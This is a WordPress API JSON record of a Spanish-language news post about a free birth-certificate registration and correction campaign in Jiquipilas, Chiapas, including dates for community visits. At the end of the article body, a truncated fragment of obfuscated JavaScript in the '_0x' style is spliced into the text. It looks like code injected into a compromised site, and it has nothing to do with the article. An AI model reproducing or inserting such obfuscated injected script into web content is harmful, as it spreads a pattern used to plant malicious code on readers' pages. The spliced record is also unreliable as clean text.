{"id":9675,"date":"2023-04-21T04:09:23","date_gmt":"2023-04-21T04:09:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9675"},"modified":"2023-04-21T04:09:24","modified_gmt":"2023-04-21T04:09:24","slug":"en-jiquipilas-inicia-campana-de-actas-de-nacimiento","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9675","title":{"rendered":"En Jiquipilas inicia campa\u00f1a de actas de nacimiento"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230420-WA0086-1024x577.jpg\" alt=\"\" class=\"wp-image-9676\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230420-WA0086-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230420-WA0086-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230420-WA0086-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230420-WA0086-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230420-WA0086.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022  La Presidenta del DIF Madely Montejo Maza exhort\u00f3 a los jiquipiltecos a aprovechar los asentamientos y correcciones ya que ser\u00e1n gratuitos. <\/p>\n\n\n\n<p>\u2022 Agradeci\u00f3 a la directora General y al personal del registro civil de Jiquipilas por brindar las facilidades en esta campa\u00f1a. <\/p>\n\n\n\n<p>Jiquipilas, Chiapas. \u2013 Luego de establecer acuerdos con la Direcci\u00f3n General del Registro Civil del Estado dio inicio la campa\u00f1a de asentamientos y correcciones de actas de nacimiento de manera gratuita, confirm\u00f3 la Presidenta del sistema DIF Madely Montejo Maza.La campa\u00f1a brindar\u00e1 la oportunidad a las personas que deseen tramitar este importante documento de identidad con validez jur\u00eddica, por lo que se exhort\u00f3 a que aprovechen estas acciones, donde tambi\u00e9n se recalc\u00f3 el inter\u00e9s del Alcalde Hugo L\u00e1zaro Rodr\u00edguez. La Presidenta del DIF estuvo acompa\u00f1ada por Jorge Durante Iturbe Oficial del Registro Civil de Jiquipilas y Liliana Orantes Pereyra quien funge como enlace de Ayuntamiento con el Registro Civil para apoyar a las personas en los tramites.En la campa\u00f1a podr\u00e1n realizar asentamientos extempor\u00e1neos de cero a 17 a\u00f1os, correcci\u00f3n de actas por error, as\u00ed como corregir detalles mecanogr\u00e1ficos, ortogr\u00e1ficos, que no cuente con el lugar de nacimiento, sexos no especificados o err\u00f3neos y error en la CURP. Madely Montejo, dio a conocer que se atender\u00e1n a personas de cabecera municipal del 19 al 25 de abril en el DIF Municipal y se visitar\u00e1n algunas comunidades a partir del 26 de abril iniciando en Tierra y Libertad, el 3 de mayo en Tiltepec, 17 de mayo en Pino Su\u00e1rez, 24 de mayo en Palestina, 7 de junio en Quintana Roo y el 14 de junio en Plan de Ayala.Por \u00faltimo Agradeci\u00f3 a todo el personal que labora en el registro civil de Jiquipilas por facilitar y apoyar para que esta campa\u00f1a de mucho beneficio para las y los jiquipiltecos pueda llevarse acabo.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 La Presidenta del DIF Madely Montejo Maza exhort\u00f3 a los jiquipiltecos a aprovechar los asentamientos y correcciones ya que ser\u00e1n gratuitos. \u2022 Agradeci\u00f3 a la directora General y al personal del registro civil de Jiquipilas por brindar las facilidades en esta campa\u00f1a. Jiquipilas, Chiapas. \u2013 Luego de establecer acuerdos con la Direcci\u00f3n General del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9676,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9675","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9675","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9675"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9675\/revisions"}],"predecessor-version":[{"id":9677,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9675\/revisions\/9677"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9676"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9675"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9675"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9675"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}